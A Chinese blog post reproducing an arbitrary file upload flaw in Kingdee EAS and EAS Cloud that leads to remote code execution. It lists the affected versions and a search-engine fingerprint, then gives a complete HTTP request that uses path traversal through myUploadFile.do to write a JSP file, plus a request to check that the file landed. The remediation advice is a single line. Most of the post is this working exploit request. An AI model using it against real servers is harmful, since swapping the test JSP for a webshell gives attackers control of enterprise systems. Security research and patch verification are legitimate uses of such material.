【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量304 收藏 3
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/137332298
版权

【漏洞概述】

金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

【漏洞介绍】

金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞

【影响版本】

金蝶 EAS 8.0,8.1,8.2,8.5
金蝶 EAS Cloud 8.6私有云,8.6公有云,8.6.1,8.8

【指纹】

app=”Kingdee-EAS”

【产品界面】

图片

【利用过程】
Kingdee EAS EAS Cloud myUploadFile.do接口存在任意文件上传问题

POST /easportal/xxx/%2e%2e/xxx/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Cookie: sl-session=sqPhC9MLJmWsiN7c9/P6tA==
Accept-Encoding: gzip, deflate
Content-Length: 210
SL-CE-SUID: 47

------WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Disposition: form-data; name="myFile"; filename="/demo.jsp"
Content-Type: text/html

<%out.println("test123");%>
------WebKitFormBoundarySq4lDnabv8CwHfvx--

【验证】

GET /easportal/xxx/../demo.jsp HTTP/1.1
Host: 127.0.0.1

图片

【修复建议】

及时更新软件版本

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

运维Z叔
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1046
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶 EASEAS Cloud JNDI注入漏洞复现
0xSec
12-22 1155
金蝶 EASEAS Cloudappmonitor/protect/jndi/loadTree 路径 jndiName 参数存在JNDI注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
0Day!!通杀未公开漏洞-金蝶EAS plt_portal接口存在任意文件上传-大量资产
weixin_43167326的博客
03-19 681
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 655
金蝶 EASEAS Cloud 存在远程代码执行漏洞
漏洞复现金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 133
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
金蝶 EASEAS Cloud任意文件上传漏洞
weixin_52204925的博客
01-25 754
金蝶 EASEAS Cloud任意文件上传漏洞
Goby 漏洞发布| 金蝶 EAS createDataSource 路径 jndiName 参数远程代码执行漏洞
m0_46699477的博客
12-22 478
金蝶 EAS Cloud 融合了金蝶苍穹的 gPaaS 功能,是基于云原生架构的平台产品,可以进行容器化部署,具备一切云原生的架构特性,是一款拥有最先进底层架构的平台产品。金蝶 EAS Cloud 存在 jndi 注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
复现金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 1140
复现金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。
金蝶EAS V8.5 发版说明.pdf
10-03
金蝶EAS V8.5 发版说明 产品简介 时代在快速发生着变化,人工智能、区块链、云计算、大数据、IOT 等新技术在广泛影 响着社会的发展,同时企业管理也在发生的变化:组织边界模糊、多元共生、个体崛起、共 享管理等,...
金蝶EAS8.0用户手册
03-13
金蝶EAS8.0用户手册,方便金蝶用户下载学习交流
金蝶EAS Cloud用户手册丛书指南-web离线版(8.0+)
03-11
金蝶EAS Cloud用户手册丛书指南离线版,金蝶EAS Cloud用户手册丛书指南web版,金蝶EAS Cloud8.6 用户手册丛书指南,金蝶EAS Cloud用户操作手册,金蝶EAS Cloud用户指南,金蝶EAS Cloud操作手册,金蝶EAS Cloud操作指南...
金蝶 EAS 凭证引入 “webservice 接口”说明
08-15
金蝶 EAS WebService总账(凭证引入)接口说明。会计凭证webservice 导入接口。
金蝶EAS数据字典
12-25
金蝶EAS数据字典,针对金蝶EAS软件中的所有字段的名称查询。
登录安全分析报告:小米官网注册
Explinks的博客
05-29 1033
图形验证及交互验证方式的安全性到底如何?请看具体分析。
【竞赛】本科阶段部分证书考试 & 科研竞赛 的 网站导航(算法、项目、安全、数据、科研)
小哈里的博客
05-28 1072
【竞赛】本科阶段部分证书考试 & 科研竞赛 的 网站导航(算法、项目、安全、数据、科研) 文章目录 1、算法竞赛(重点) PAT/CSP 天梯赛/蓝桥/力扣 ICPC 算法竞赛 编程工具 代码源 其他 2、项目竞赛 安全与数据(重点) 项目竞赛官网 & 学习资料(独立) 网络安全 & CTF导航(独立) 项目+1(独立) 科研成果(独立) 3、其他补充 党团相关 不挂科 证书考试 零零碎碎 更多
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 355
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 773
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
金蝶eas cloud
08-26
金蝶EAS Cloud是一种企业级的云端应用部署解决方案。根据引用,金蝶EAS Cloud的部署可以通过负载均衡、WEB安全等方式来进行配置。其中,负载均衡可以通过华为云控制台的云解析服务来创建公网域名,如引用所述。此外,引用提到ELB弹性负载均衡也是一种可选的配置方式。因此,金蝶EAS Cloud的部署可以包括负载均衡、WEB安全以及可选的ELB配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [云上武功秘籍(三)华为云上部署金蝶EAS Cloud](https://blog.csdn.net/sutao_w3/article/details/115260249)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值